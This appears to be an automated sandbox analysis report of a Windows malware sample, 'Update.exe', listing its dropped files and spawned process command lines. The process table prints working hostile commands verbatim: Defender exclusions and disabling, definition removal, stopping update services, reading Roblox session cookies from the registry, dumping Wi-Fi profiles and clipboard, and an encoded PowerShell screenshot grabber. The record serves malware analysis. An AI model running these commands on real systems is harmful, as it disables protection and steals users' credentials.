Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Update.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Build.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_bz2.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_ctypes.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_decimal.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_hashlib.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_lzma.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_queue.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_socket.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_sqlite3.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\_ssl.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\libcrypto-1_1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\libffi-7.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\libssl-1_1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\python310.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\rarreg.key
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\select.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\sqlite3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\unicodedata.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Windows\Temp\jxokwqntprmq.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ ?? ?? \Display (1).png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES8576.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Mon Sep 9 06:07:02 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\VCRUNTIME140.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI68522\bound.blank
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_025xchzj.1yp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hlrlury.aob.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fuprbfx.s1n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ri3bsk2.dqt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tocp5wi.spm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20ysg5xx.exv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34w2frg5.sp2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ryuu3g3.asp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uzwljs2.kal.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3ejxeyf.hdj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a53tnpzv.rdj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epkgjt0u.0rf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2mof1dx.lax.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fza2jgeq.5oo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkdldkmv.v04.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu0yzwqb.qhi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdo2thbc.uaq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogkk0u3w.d1d.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p35bqvam.v3j.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quuqklrz.xdn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxwothsz.k2i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk2xvtmo.3it.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uakzazjh.kgj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufv0qwrl.2bk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5xi1amh.mxr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhugdfo2.bfj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj4n50bu.sgi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xikwqogl.sm2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
|
modified
|
||
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Windows\Temp\__PSScriptPolicyTest_1oo3oavh.1nn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Windows\Temp\__PSScriptPolicyTest_eifcxopy.csd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Windows\Temp\__PSScriptPolicyTest_i0ujtrnw.4fd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Windows\Temp\__PSScriptPolicyTest_jinvyoo5.hud.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 58 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Update.exe
|
"C:\Users\user\Desktop\Update.exe"
|
||
C:\Users\user\Desktop\Update.exe
|
"C:\Users\user\Desktop\Update.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection
$true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection
AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent
2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring
$true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting
Disabled -SubmitSamplesConsent NeverSend
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "start bound.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp\ ? ?.scr'"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
|
||
C:\Users\user\AppData\Local\Temp\bound.exe
|
bound.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
|
||
C:\Users\user\AppData\Local\Temp\Build.exe
|
"C:\Users\user\AppData\Local\Temp\Build.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe
|
"C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData)
-ExclusionExtension '.exe' -Force
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-Clipboard
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profile
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "systeminfo"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\systeminfo.exe
|
systeminfo
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "getmac"
|
||
C:\Windows\System32\getmac.exe
|
getmac
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop UsoSvc
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop WaaSMedicSvc
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop wuauserv
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop bits
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop dosvc
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe delete "JLDYOGXF"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Windows\System32\sc.exe
|
